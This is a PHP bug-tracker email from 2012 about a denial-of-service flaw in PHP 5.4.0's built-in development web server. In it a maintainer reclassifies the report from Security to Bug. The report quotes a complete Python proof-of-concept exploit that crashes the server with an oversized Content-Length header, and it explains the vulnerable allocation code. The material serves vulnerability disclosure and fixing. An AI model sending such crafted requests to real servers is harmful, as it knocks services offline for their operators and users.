Sec Bug->Bug #61509 [Opn]: In-built webserver denial-of-service

stas Tue, 27 Mar 2012 13:06:41 -0700

Edit report at https://bugs.php.net/bug.php?id=61509&edit=1


 ID:                 61509
 Updated by:         s...@php.net
 Reported by:        paj...@php.net
 Summary:            In-built webserver denial-of-service
 Status:             Open
-Type:               Security
+Type:               Bug
 Package:            CGI/CLI related
 Operating System:   *
 PHP Version:        5.4.0
 Block user comment: N
 Private report:     N



Previous Comments:
------------------------------------------------------------------------
[2012-03-27 20:03:57] s...@php.net

For the record, note the comment in the documentation:
"This web server is designed for developmental purposes only, and should not be 
used in production."

------------------------------------------------------------------------
[2012-03-26 12:37:39] paj...@php.net

Description:
------------
PHP version 5.4.0 built-in web server denial of service proof of concept 
exploit.


via http://packetstormsecurity.org/files/111163/php540-dos.txt

Test script:
---------------
#!/usr/bin/python
 
# Title:      PHP 5.4.0 Built-in Web Server DoS PoC
# Date:       16 March 2012
# Author:     ls (cont...@kaankivilcim.com)
# Reference:  https://bugs.php.net/bug.php?id=61461
# Comments:   Fixed in PHP 5.4.1RC1-DEV and 5.5.0-DEV
 
# The value of the Content-Length header is passed directly to a pemalloc() 
call in sapi/cli/php_cli_server.c
# on line 1538. The inline function defined within Zend/zend_alloc.h for 
malloc() will fail, and will terminate
# the process with the error message "Out of memory".
#
# 1537 if (!client->request.content) {
# 1538   client->request.content = pemalloc(parser->content_length, 1);
# 1539   client->request.content_len = 0;
# 1540 }
#
# PHP 5.4.0 Development Server started at Tue Mar 13 19:41:45 2012
# Listening on 127.0.0.1:80
# Document root is /tmp
# Press Ctrl-C to quit.
# Out of memory
 
import socket, sys
 
target = "127.0.0.1"
port   = 80;
 
request  = "POST / HTTP/1.1\n"
request += "Content-Type: application/x-www-form-urlencoded\n"
request += "Content-Length: 2147483638\n\n" # <-- Choose size larger than the 
available memory on target
request += "A=B\n\n"
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
try:
  s.connect((target, port))
except:
  print "[-] Connection to %s:%s failed!" % (target, port)
  sys.exit(0)
 
print "[+] Sending HTTP request. Check for crash on target."
 
s.send(request)
s.close()




------------------------------------------------------------------------



-- 
Edit this bug report at https://bugs.php.net/bug.php?id=61509&edit=1

Sec Bug->Bug #61509 [Opn]: In-built webserver denial-of-service

Reply via email to